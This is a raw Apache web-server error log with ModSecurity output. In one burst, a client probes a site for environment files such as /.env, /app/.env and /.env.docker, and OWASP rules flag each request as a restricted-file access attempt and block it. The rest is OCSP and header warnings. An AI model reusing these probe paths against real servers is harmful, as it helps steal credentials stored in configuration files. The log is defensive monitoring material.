[Mon May 11 21:29:29.702924 2026] [ssl:error] [pid 1511173:tid 1511181] (EAI 2)Name or service not known: [client 45.156.128.67:32900] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 21:29:29.702947 2026] [ssl:error] [pid 1511173:tid 1511181] AH01941: stapling_renew_response: responder error
[Mon May 11 21:29:36.195715 2026] [ssl:error] [pid 1502013:tid 1502050] (EAI 2)Name or service not known: [client 45.156.128.66:56302] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 21:29:36.195939 2026] [ssl:error] [pid 1502013:tid 1502050] AH01941: stapling_renew_response: responder error
[Mon May 11 21:29:36.851282 2026] [ssl:error] [pid 1516058:tid 1516100] (EAI 2)Name or service not known: [client 45.156.128.67:32926] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 21:29:36.851568 2026] [ssl:error] [pid 1516058:tid 1516100] AH01941: stapling_renew_response: responder error
[Mon May 11 21:29:39.263392 2026] [ssl:error] [pid 1511173:tid 1511199] (EAI 2)Name or service not known: [client 45.156.128.69:42638] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 21:29:39.263431 2026] [ssl:error] [pid 1511173:tid 1511199] AH01941: stapling_renew_response: responder error
[Mon May 11 21:29:45.667831 2026] [ssl:error] [pid 1501883:tid 1501885] (EAI 2)Name or service not known: [client 45.156.128.66:48360] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 21:29:45.668089 2026] [ssl:error] [pid 1501883:tid 1501885] AH01941: stapling_renew_response: responder error
[Mon May 11 21:29:48.200566 2026] [ssl:error] [pid 1511173:tid 1511188] (EAI 2)Name or service not known: [client 45.156.128.66:52720] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 21:29:48.200596 2026] [ssl:error] [pid 1511173:tid 1511188] AH01941: stapling_renew_response: responder error
[Mon May 11 21:29:49.067618 2026] [ssl:error] [pid 1516058:tid 1516091] (EAI 2)Name or service not known: [client 45.156.128.69:56184] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 21:29:49.067653 2026] [ssl:error] [pid 1516058:tid 1516091] AH01941: stapling_renew_response: responder error
[Mon May 11 21:29:56.805659 2026] [ssl:error] [pid 1501883:tid 1501897] (EAI 2)Name or service not known: [client 51.68.111.215:13737] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 21:29:56.805855 2026] [ssl:error] [pid 1501883:tid 1501897] AH01941: stapling_renew_response: responder error
[Mon May 11 21:30:01.895833 2026] [ssl:error] [pid 1501883:tid 1501906] (EAI 2)Name or service not known: [client 47.128.59.91:49300] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 21:30:01.895873 2026] [ssl:error] [pid 1501883:tid 1501906] AH01941: stapling_renew_response: responder error
[Mon May 11 21:30:07.717091 2026] [security2:error] [pid 1534836:tid 1534888] [client 34.105.200.187:55312] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/.env.local"] [unique_id "agIuP9eaRXe5lR8y0ZOfxQAAAVE"]
[Mon May 11 21:30:07.717634 2026] [security2:error] [pid 1534836:tid 1534888] [client 34.105.200.187:55312] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/.env.local"] [unique_id "agIuP9eaRXe5lR8y0ZOfxQAAAVE"]
[Mon May 11 21:30:07.719286 2026] [security2:error] [pid 1511173:tid 1511197] [client 34.105.200.187:55320] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/app/.env"] [unique_id "agIuP_jVc-A-CSptvm1_OAAAAFU"]
[Mon May 11 21:30:07.719939 2026] [security2:error] [pid 1511173:tid 1511197] [client 34.105.200.187:55320] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/app/.env"] [unique_id "agIuP_jVc-A-CSptvm1_OAAAAFU"]
[Mon May 11 21:30:07.721699 2026] [security2:error] [pid 1501831:tid 1501838] [client 34.105.200.187:55322] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/.env"] [unique_id "agIuP1NddpkriGUb6ZWDpgAAAQU"]
[Mon May 11 21:30:07.721863 2026] [security2:error] [pid 1502013:tid 1502059] [client 34.105.200.187:55338] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/admin/.env"] [unique_id "agIuP5Yn-x0CHsbEbP25AQAAAIk"]
[Mon May 11 21:30:07.721929 2026] [security2:error] [pid 1501831:tid 1501838] [client 34.105.200.187:55322] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/.env"] [unique_id "agIuP1NddpkriGUb6ZWDpgAAAQU"]
[Mon May 11 21:30:07.722199 2026] [security2:error] [pid 1502013:tid 1502059] [client 34.105.200.187:55338] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/admin/.env"] [unique_id "agIuP5Yn-x0CHsbEbP25AQAAAIk"]
[Mon May 11 21:30:07.725266 2026] [security2:error] [pid 1516058:tid 1516095] [client 34.105.200.187:55346] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/api/.env"] [unique_id "agIuPyMeXtzav-mi9Sy-QwAAAMU"]
[Mon May 11 21:30:07.725440 2026] [security2:error] [pid 1516058:tid 1516095] [client 34.105.200.187:55346] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/api/.env"] [unique_id "agIuPyMeXtzav-mi9Sy-QwAAAMU"]
[Mon May 11 21:30:07.730864 2026] [security2:error] [pid 1501883:tid 1501905] [client 34.105.200.187:55360] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.docker"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/.env.docker"] [unique_id "agIuPzP5Q_-MBliRCAx07AAAABQ"]
[Mon May 11 21:30:07.731132 2026] [security2:error] [pid 1501883:tid 1501905] [client 34.105.200.187:55360] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/.env.docker"] [unique_id "agIuPzP5Q_-MBliRCAx07AAAABQ"]
[Mon May 11 21:30:07.737980 2026] [security2:error] [pid 1534836:tid 1534887] [client 34.105.200.187:55364] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/.env.dev.local"] [unique_id "agIuP9eaRXe5lR8y0ZOfxgAAAVA"]
[Mon May 11 21:30:07.738190 2026] [security2:error] [pid 1534836:tid 1534887] [client 34.105.200.187:55364] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/.env.dev.local"] [unique_id "agIuP9eaRXe5lR8y0ZOfxgAAAVA"]
[Mon May 11 21:30:07.744373 2026] [security2:error] [pid 1511173:tid 1511188] [client 34.105.200.187:55380] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/.env.development.local"] [unique_id "agIuP_jVc-A-CSptvm1_OQAAAEw"]
[Mon May 11 21:30:07.744563 2026] [security2:error] [pid 1511173:tid 1511188] [client 34.105.200.187:55380] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/.env.development.local"] [unique_id "agIuP_jVc-A-CSptvm1_OQAAAEw"]
[Mon May 11 21:30:07.752568 2026] [security2:error] [pid 1502013:tid 1502036] [client 34.105.200.187:55392] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/app/.env.local"] [unique_id "agIuP5Yn-x0CHsbEbP25AgAAAIc"]
[Mon May 11 21:30:07.752795 2026] [security2:error] [pid 1502013:tid 1502036] [client 34.105.200.187:55392] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/app/.env.local"] [unique_id "agIuP5Yn-x0CHsbEbP25AgAAAIc"]
[Mon May 11 21:30:07.755495 2026] [security2:error] [pid 1501831:tid 1501850] [client 34.105.200.187:55400] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/.env.dev"] [unique_id "agIuP1NddpkriGUb6ZWDpwAAARE"]
[Mon May 11 21:30:07.755721 2026] [security2:error] [pid 1501831:tid 1501850] [client 34.105.200.187:55400] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/.env.dev"] [unique_id "agIuP1NddpkriGUb6ZWDpwAAARE"]
[Mon May 11 21:30:07.827534 2026] [security2:error] [pid 1501831:tid 1501838] [client 34.105.200.187:55322] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agIuP1NddpkriGUb6ZWDpgAAAQU"]
[Mon May 11 21:30:07.834479 2026] [security2:error] [pid 1534836:tid 1534887] [client 34.105.200.187:55364] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agIuP9eaRXe5lR8y0ZOfxgAAAVA"]
[Mon May 11 21:30:07.845856 2026] [security2:error] [pid 1501883:tid 1501905] [client 34.105.200.187:55360] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agIuPzP5Q_-MBliRCAx07AAAABQ"]
[Mon May 11 21:30:07.864832 2026] [security2:error] [pid 1501831:tid 1501850] [client 34.105.200.187:55400] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agIuP1NddpkriGUb6ZWDpwAAARE"]
[Mon May 11 21:30:07.882856 2026] [security2:error] [pid 1502013:tid 1502036] [client 34.105.200.187:55392] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agIuP5Yn-x0CHsbEbP25AgAAAIc"]
[Mon May 11 21:30:07.886780 2026] [security2:error] [pid 1534836:tid 1534888] [client 34.105.200.187:55312] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agIuP9eaRXe5lR8y0ZOfxQAAAVE"]
[Mon May 11 21:30:07.889836 2026] [security2:error] [pid 1516058:tid 1516095] [client 34.105.200.187:55346] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agIuPyMeXtzav-mi9Sy-QwAAAMU"]
[Mon May 11 21:30:07.900684 2026] [security2:error] [pid 1511173:tid 1511197] [client 34.105.200.187:55320] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agIuP_jVc-A-CSptvm1_OAAAAFU"]
[Mon May 11 21:30:07.905721 2026] [security2:error] [pid 1502013:tid 1502059] [client 34.105.200.187:55338] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agIuP5Yn-x0CHsbEbP25AQAAAIk"]
[Mon May 11 21:30:07.938979 2026] [security2:error] [pid 1511173:tid 1511188] [client 34.105.200.187:55380] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agIuP_jVc-A-CSptvm1_OQAAAEw"]
[Mon May 11 21:30:18.671844 2026] [security2:error] [pid 1501831:tid 1501845] [client 43.153.49.151:55102] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.apoe.fr"] [uri "/index.html"] [unique_id "agIuSlNddpkriGUb6ZWDrQAAAQw"]
[Mon May 11 21:30:19.495928 2026] [security2:error] [pid 1501883:tid 1501901] [client 43.130.57.76:55056] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "of-crystal-lake.net"] [uri "/page.php"] [unique_id "agIuSzP5Q_-MBliRCAx09wAAABA"]
[Mon May 11 21:30:33.978765 2026] [security2:error] [pid 1502013:tid 1502043] [client 170.106.35.137:59446] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/camping-port-grimaud/activites/activites-sportives/embed/"] [unique_id "agIuWZYn-x0CHsbEbP25HgAAAJA"]
[Mon May 11 21:30:49.426989 2026] [ssl:error] [pid 1501831:tid 1501852] (EAI 2)Name or service not known: [client 114.119.154.11:63757] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 21:30:49.427151 2026] [ssl:error] [pid 1501831:tid 1501852] AH01941: stapling_renew_response: responder error
[Mon May 11 21:30:54.452031 2026] [ssl:error] [pid 1534836:tid 1534895] (EAI 2)Name or service not known: [client 114.119.154.11:63759] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 21:30:54.452076 2026] [ssl:error] [pid 1534836:tid 1534895] AH01941: stapling_renew_response: responder error
[Mon May 11 21:31:26.602504 2026] [ssl:error] [pid 1516058:tid 1516102] (EAI 2)Name or service not known: [client 74.7.241.176:53260] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 21:31:26.602665 2026] [ssl:error] [pid 1516058:tid 1516102] AH01941: stapling_renew_response: responder error
[Mon May 11 21:31:31.207544 2026] [security2:error] [pid 1502013:tid 1502047] [client 49.51.252.146:40732] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.jeanboyault.fr"] [uri "/filature/"] [unique_id "agIuk5Yn-x0CHsbEbP25YwAAAJU"]
